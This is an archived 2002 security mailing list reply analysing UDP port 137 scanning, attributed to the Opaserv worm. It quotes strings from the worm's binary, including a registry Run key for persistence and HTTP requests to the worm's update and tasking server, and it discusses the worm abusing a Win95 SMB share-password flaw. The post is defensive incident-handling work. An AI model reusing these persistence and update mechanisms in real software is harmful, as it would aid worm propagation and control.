Security Incidents mailing list archives

Re: Unusual volume: UDP:137 probes

From: Alain Fauconnet <alain () cscoms net>
Date: Fri, 4 Oct 2002 14:13:55 +0700

On Fri, Oct 04, 2002 at 07:58:18AM +1200, Nick FitzGerald wrote:

Richard.Grant () mail state ky us wrote:
Two...

You are right that Bugbear does not produce the flood of port 137 
traffic currently being reported.  Bugbear does some spreading via 
open or otherwise accessible shares (those writable with the 
permissions of the user that ran the EXE) but it uses standard 
known network resource enumeration APIs to do its work.  Opaserv (aka 
Scrup, Scrsvr, Opasoft) aggressively scans for machines listening on
port 137 and is the likely source of most of the increased port 137 
activity.

ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Wind
ows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Interne
t
Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat
.ScrSout.dat.scrupd.exe.www.opasoft.com.GET
http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0
HTTP/1.1..Host: www.opasoft.com.....GET
http://www.opasoft.com/work/lastver HTTP/1.1..Host:

<<snip>>


Talking of Opaserv, I have an example of a Win95 OSR2.1  box  (yes,  I
know)  which saw SCRSVR.EXE appear in its Windows folder while online.
McAfee caught it immediately so  it  didn't  have  a  chance  to  run.
However  this  box *did* have passwords set on the shares (yes, all of
them, I have checked).

These passwords were quite non-obvious so I doubt that they  could  be
found as a result of brute-force attack.

I  know that Win95 had its share of bugs regarding SMB passwords. This
one looks like a good candidate:

http://security-archive.merton.ox.ac.uk/bugtraq-200010/0228.html
NSFOCUS Security Advisory(SA2000-05)

But  then  it means that Opaserv goes beyond checking for passwordless
shares (that's all I have seen written so far). It also exploits known
vulnerabilities.

Greets,
_Alain_

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

RE: Unusual volume: UDP:137 probes Bamm (Robert) Visscher (Sep 30)
- <Possible follow-ups>
- Re: Unusual volume: UDP:137 probes Nick FitzGerald (Sep 30)
- RE: Unusual volume: UDP:137 probes Mark Forsyth (Sep 30)
- RE: Unusual volume: UDP:137 probes Joseph R. Gruber (Sep 30)
- Re: Unusual volume: UDP:137 probes Hugo van der Kooij (Sep 30)
  - SV: Unusual volume: UDP:137 probes Peter Kruse (Oct 01)
- Re: Unusual volume: UDP:137 probes Christopher Albert (Sep 30)
- RE: Unusual volume: UDP:137 probes Richard . Grant (Oct 01)
  - RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
    - Re: Unusual volume: UDP:137 probes Alain Fauconnet (Oct 04)
    - Re: Unusual volume: UDP:137 probes Matt Power (Oct 05)
- RE: Unusual volume: UDP:137 probes Scott, Michael R. (Oct 01)
- Re: Unusual volume: UDP:137 probes Axel Pettinger (Oct 01)
  - Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)
    - maybe a simple problem Andrew Fison (Oct 02)
    - Re: maybe a simple problem Igor D. Spivak (Oct 02)
    - RE: maybe a simple problem Greg Reber (Oct 03)
    - Re: maybe a simple problem Brad Arlt (Oct 03)
- RE: Unusual volume: UDP:137 probes Scott, Michael R. (Oct 01)
  - Re: Unusual volume: UDP:137 probes John Sage (Oct 01)

(Thread continues...)